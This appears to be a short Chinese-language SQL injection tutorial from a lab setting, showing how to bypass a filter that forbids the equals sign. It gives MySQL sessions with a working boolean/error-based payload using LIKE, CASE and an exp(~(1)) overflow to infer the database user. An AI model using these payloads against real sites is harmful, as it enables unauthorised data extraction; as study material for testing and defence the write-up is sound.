0x00 概要

不允许 等于号( = ) 出现时的注入方法

0x01 测试数据

  1. mysql> select user();
  2. +----------------+
  3. | user()         |
  4. +----------------+
  5. | root@localhost |
  6. +----------------+
  7. 1 row in set (0.00 sec)
  1. mysql> select * from users where id=1;
  2. +----+----------+----------+
  3. | id | username | password |
  4. +----+----------+----------+
  5. |  1 | Dumb     | Dumb     |
  6. +----+----------+----------+
  7. 1 row in set (0.00 sec)

0x02 测试

  • 注意:

  • 如果使用了like又使用了延时会导致全表查询

  • 例如:

  • users 表的数据为 23 条

  • 延时 0.1S

  • 0.1 * 23 = 2.3S 最后会延时2.3S 所以要尽量避免这样干
  1. // 正确的情况
  2. // 会返回原来的数据页面保持不变
  3. mysql> select * from users where id=1-(case when (select user()) like 'root%' then 0 else exp(~(1)) end);
  4. +----+----------+----------+
  5. | id | username | password |
  6. +----+----------+----------+
  7. |  1 | Dumb     | Dumb     |
  8. +----+----------+----------+
  9. 1 row in set (0.00 sec)
  11. # 请仔细看id=1-0 和1-1 的结果
  12. mysql> select * from users where id=1-0
  13.     -> ;
  14. +----+----------+----------+
  15. | id | username | password |
  16. +----+----------+----------+
  17. |  1 | Dumb     | Dumb     |
  18. +----+----------+----------+
  19. 1 row in set (0.00 sec)
  21. mysql> select * from users where id=1-1;
  22. Empty set (0.00 sec)
  1. // 错误的情况
  2. // 页面会爆错,如果关闭了错误提示,页面的数据会为空
  3. mysql> select * from users where id=1-(case when (select user()) like 'soot%' then 1 else exp(~(1)) end);
  4. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~(1))'